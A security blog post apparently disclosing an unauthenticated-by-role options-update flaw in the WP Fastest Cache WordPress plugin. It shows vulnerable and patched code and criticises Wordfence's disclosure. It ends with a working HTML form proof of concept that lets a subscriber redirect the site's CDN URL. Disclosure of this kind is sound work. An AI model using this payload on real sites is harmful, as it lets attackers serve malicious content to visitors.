25 May

Protecting You Against Wordfence’s Bad Practices: Unauthorized Options Update Vulnerability in WP Fastest Cache

Wordfence is putting WordPress website at risk by disclosing vulnerabilities in plugins with critical details needed to double check their work missing, in what appears to be an attempt to profit off of these vulnerabilities. We are releasing those details so that others can review the vulnerabilities to try to limit the damage Wordfence’s practice could cause.

Wordfence describes the vulnerability in WP Fastest Cache version 0.8.5.7 as “The Options Update vulnerability allows an attacker to access and make changes to the CDN (Content Delivery Network) options for the website. With this control an attacker can direct all requests for css files, images, videos, etc. to their site, allowing them to serve malicious content to visitors of the vulnerable site.”

The relevant change in the next version was to restrict the AJAX accessible function wpfc_save_cdn_integration_ajax_request_callback() to Administrator level users in the file /wpFastestCache.php .

Code in 0.8.5.7:

335
336
337
338
339
340
341
342
343
344
public function wpfc_save_cdn_integration_ajax_request_callback(){
	$values = json_encode($_POST["values"]);
	if(get_option("WpFastestCacheCDN")){
		update_option("WpFastestCacheCDN", $values);
	}else{
		add_option("WpFastestCacheCDN", $values, null, "yes");
	}
	echo json_encode(array("success" => true));
	exit;
}

Code in 0.8.5.8:

348
349
350
351
352
353
354
355
356
357
358
359
360
361
public function wpfc_save_cdn_integration_ajax_request_callback(){
	if(current_user_can('manage_options')){
		$values = json_encode($_POST["values"]);
		if(get_option("WpFastestCacheCDN")){
			update_option("WpFastestCacheCDN", $values);
		}else{
			add_option("WpFastestCacheCDN", $values, null, "yes");
		}
		echo json_encode(array("success" => true));
		exit;
	}else{
		wp_die("Must be admin");
	}
}

Wordfence’s description notably doesn’t mention that the attacker needs to be logged in to WordPress to exploit this, which severely limits the severity of the vulnerability.

Proof of Concept

The following proof of concept will set the CDN URL to example.com.

Make sure you are logged in to WordPress, ideally as a subscriber since they have the least capabilities. Also, make sure to replace “[path to WordPress]” with the location of WordPress

<html>
 <body>
 <form action="http://[path to WordPress]/wp-admin/admin-ajax.php"; method="POST">
 <input type="hidden" name="action" value="wpfc_save_cdn_integration_ajax_request" />
 <input type="hidden" name="values[success]" value="false" />
 <input type="hidden" name="values[id]" value="other" />
 <input type="hidden" name="values[cdnurl]" value="example.com" />
 <input type="hidden" name="values[originurl]" value="" />
 <input type="hidden" name="values[file_types]" value="css,js,gif,png,jpg,jpeg,ttf,otf,woff,less,mp4,svg,eot" />
 <input type="hidden" name="file_types" value="css,js,gif,png,jpg,jpeg,ttf,otf,woff,less,mp4,svg,eot" />
 <input type="submit" value="Submit" />
 </form>
 </body>
</html>

Leave a Reply

Your email address will not be published. Required fields are marked *